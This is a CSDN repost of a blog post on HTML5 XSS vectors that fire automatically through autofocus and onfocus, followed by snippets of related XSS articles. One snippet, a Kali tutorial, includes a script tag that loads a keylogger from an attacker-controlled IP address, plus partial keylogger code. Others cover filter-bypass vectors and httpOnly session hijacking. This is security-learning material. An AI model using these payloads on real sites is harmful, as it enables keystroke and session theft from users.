html5 xss,HTML5 new XSS vectors

最新推荐文章于 2023-12-12 14:21:36 发布
转载 最新推荐文章于 2023-12-12 14:21:36 发布 · 120 阅读 · 0
文章标签:

#html5 xss

本文介绍了一种利用HTML5特性实现跨站脚本(XSS)自动执行的新方法。该方法通过autofocus和onfocus属性绕过<和>过滤,适用于多种浏览器,包括Safari、Chrome和Opera。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

So I posted some new XSS vectors on twitter and I thought I’d share them on the blog in case anyone missed them. Safari, Chrome and Opera all support these now 🙂 We have a brand new way of auto executing XSS.

Normally when you find a XSS hole within a input element that has filtered < and > you can’t exploit it automatically without using CSS expressions. The injection looks something like:-

Here you can do style=xss:expression(alert(1)) or moz-binding etc. but it only works on a limited number of browsers. HTML5 however lets us execute like expressions but without css styles. For example:-

We use the “autofocus” feature to focus our element and then the onfocus event to execute our XSS. This works with a plethora (I like that word) of tags. Any form based element it seems you can use this method:-

kali渗透学习-Web渗透XSS(二)漏洞利用-键盘记录器,xsser
weixin_43239236的博客
01-23 516
原则上:只要XSS漏洞存在,可以编写任何功能的js脚本 反射型漏洞利用 键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上 服务器:kali    客户端 启动apache2服务:service apache2 start 语法: <script src="http://192.168.1.127/keylogger.js"></script> keylogger.js 键盘记录器 需要修改里面的接受地址 document.onkeypress = function(ev
【安全牛学习笔记】​XSS- 键盘记录器和反射型XSS
edu_aqniu的博客
09-30 1142
XSS                         Keylogger.js  document.onkeypress = function(evt){      evt = evt || window.event     key = String.fromCharCode(evt.charCode)     if(key){         var htt
12个有趣的 XSS Vector
weixin_34038652的博客
06-30 247
XSS Vector #1 <script src=/〱20.rs></script> URL中第二个斜杠在Internet Explorer下(测试于IE11)可被U+3031,U+3033,U+3035,U+309D,U+30FC,U+30FD,U+FF70代替。在特定环境下可以帮助测试者绕过一些正则。 XSS Vecto...
H5SC:HTML5安全备忘单-与HTML5相关的XSS攻击向量的集合
04-05
HTML5安全备忘单 这是H5SC或HTML5安全备忘单的新目录。 在这里,您会发现三件事: 与HTML5相关的XSS攻击向量的集合 一组用于XSS测试的有用文件 一组以前隐藏的功能,可用于XSS测试 XSS向量 XSS向量的集合可以在这里找到: : 有用的文件 我们发布了在各种情况下对XSS测试有用的文件列表。 当前,以下文件可用: 欢迎拉取请求,我们将文件存储在/attachments子文件夹中。 隐藏功能 H5SC当前具有三个“隐藏”功能 RSS模式以测试提要阅读器: : /rss/+/会在将来为unix时间戳记提供300秒的时间(以方便使用) /rss/+123/将来会提供UNIX时间戳123秒 /rss/1234/将提供最少的RSS提要,直到Unix时间为1234。 一个JavaScript函数,用于以字符串形式(隔离并编号)返回所有矢量:转到并执行vector
html5 在线检测,基于HTML5XSS检测技术研究
weixin_33375514的博客
05-30 192
Research on XSS detection technology based on HTML5Wu Liu1吴柳(1992-),女,北京邮电大学硕士生,主要研究方向:网络与信息安全,Web安全。Ma Zhaofeng1马兆丰(1974-),男,讲师,主要研究方向:信息安全,数字水印。1、Information?Security?Center,?Beijing University of P...
html5 新标签xss,HTML5安全攻防详析之七:新标签攻击
weixin_39620578的博客
06-16 311
HTML5去掉了很多过时的标签,例如``和,同时又引入了许多有趣的新标签,例如``和``标签可以允许动态的加载音频和视频。HTML5引入的新标签包括`、、、、`等等,而这些标签又有一些有趣的属性,例如poster、autofocus、onerror、formaction、oninput,这些属性都可以用来执行javascript。这会导致XSS和CSRF跨域请求伪造。下面我们要讲到就是这些关键载体...
基于机器学习的xss入侵检测
最新发布
03-01
常见的选项有支持向量机(SVM)[^4]、随机森林(Random Forests)[^5]和支持向量数据描述(SVDD)[^6]等。通过大量标注过的样本进行离线训练后得到一个具备良好泛化能力的预测函数。 #### 实时监控部署 最后,在实际应用...
【渗透测试笔记】七、XSS跨站脚本漏洞
【User Not Found】的博客
04-25 1130
We are all in the gutter, but some of us are looking at the stars. 身在井隅,心向璀璨。 本文仅供学习交流,正确使用渗透测试,遵守相关法律法规,请勿用于非法用途。 目录实验环境关于漏洞漏洞挖掘1. Reflected Cross Site Scripting (XSS)2. beef xss framework 实验环境 本实验...
【SpyGlass规则初探】:5分钟内掌握内建规则使用技巧
[【SpyGlass规则初探】:5分钟内掌握内建规则使用技巧](https://img-blog.csdnimg.cn/9b7df23b0f94440d9d145133da20c9d8.png) 参考资源链接:[SpyGlass内置规则参考指南(L-2016.06版)]...
利用HTML5的CORS特性绕过httpOnly的限制实现XSS会话劫持
bylfsj的博客
03-21 4312
文章目录0×00. 前言 0×01. 前提条件0×02. 本次实验环境漏洞环境:使用到的工具: 0×03. 测试过程1) 事先插入一段xss代码2) 配置好用户端的hosts3)开始测试0×04. shell of the future 劫持会话原理图0×05. 不足 * 本文原创作者:ForrestX386,本文属Fr...
html5 新标签xss,HTML5 localStorageXSS漏洞
weixin_30054007的博客
06-16 457
localStorage基础WindowlocalStorage属性HTML5 提供了两种新的本地存储方案,sessionStorage和localStorage,统称WebStorage。顾名思义:sessionStorage 是针对session的数据存储,关闭窗口后删除。localStorage 是一个本地的没有时间限制的数据存储。它们同样遵循SOP语法:window.localStor...
xss绕过方法有哪些?XSS攻击绕过过滤方法技巧分享(xss绕过宝塔)
白帽子佳奇的博客
12-12 7167
XSS(跨站脚本攻击)绕过方法是一系列技巧,用来绕过目标网站的安全措施和过滤器,执行恶意的脚本。
XSS渗透与防御——(三)XSSER语法
FisrtBqy的博客
03-24 1597
第三章 XSSER语法 Usage: xsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]` [Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [T
浅谈跨网站脚本攻击(XSS)的手段与防范(简析新浪微博XSS攻击事件)
tansitongba
01-13 583
本文主要涉及内容: 什么是XSS XSS攻击手段和目的 XSS的防范 新浪微博攻击事件 什么是XSS 跨网站脚本(Cross-sitescripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常...
HTML中可能使用为协议造成XSS 的属性
JackLiu16的博客
12-23 1221
新思路: 1、服务端可以过滤敏感标签 2、使用html 属性 为协议javascript:[code] 3、若服务端过滤关键字,可以通过空格回车Tab 等加载在关键字中间通过过滤,因为js语句结束是分号,所以浏览器加载引擎会继续发现这些分隔号后面的内容。 4、HTML属性值本身支持ASCII编码,也可以通过编码绕过过滤(其他编码格式base64) 5、还可以通过标签事件来触发XSS,如:
关于HTML 代码注入,XSS攻击问题解决
热门推荐
帅大叔的博客
10-19 3万+
大部分的网站一般都有评论功能或留言功能,或类似可以让用户写东西的地方。如果后台不经过处理,又把数据返回前端,这就会出问题了。网页解析器会把用户的信息也当成html代码给解析了。如果用户写的是一些恶意的 js 脚本这是很危险的。专业术语叫:XSS 攻击一、举个例子:假设后台和前台都没有对用户的信息,进行处理。我们输入如下的代码:<script> var body= document.body;
WEB安全实战(五)XSS 攻击的另外一种解决方案(推荐)
紫羽风的博客
11-20 2万+
序 说到 XSS 攻击,前边已经有两篇文章在讲这个事了,这次又拿出来说,主要是针对最近工作中的一些新的问题。那么之前是怎么解决这个问题的呢?为什么又要换解决方案?下面就详细的跟大家分享一下。 旧方案 公司的测试团队发现这个问题之后,就要求尽快的解决,在网上查了很多相关的资料,也翻阅了基本安全方面的书,基于 XSS 的攻击原理,自己写了一个 Filter,并在该
无括号和svg的xss构造利用
蚁景网安学院
06-05 934
前言最近我学习了一些新的xss技巧在这里分享给大家!0x01 JavaScript without parentheses using DOMMatrix背景以前我们有两个解决xss不带...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值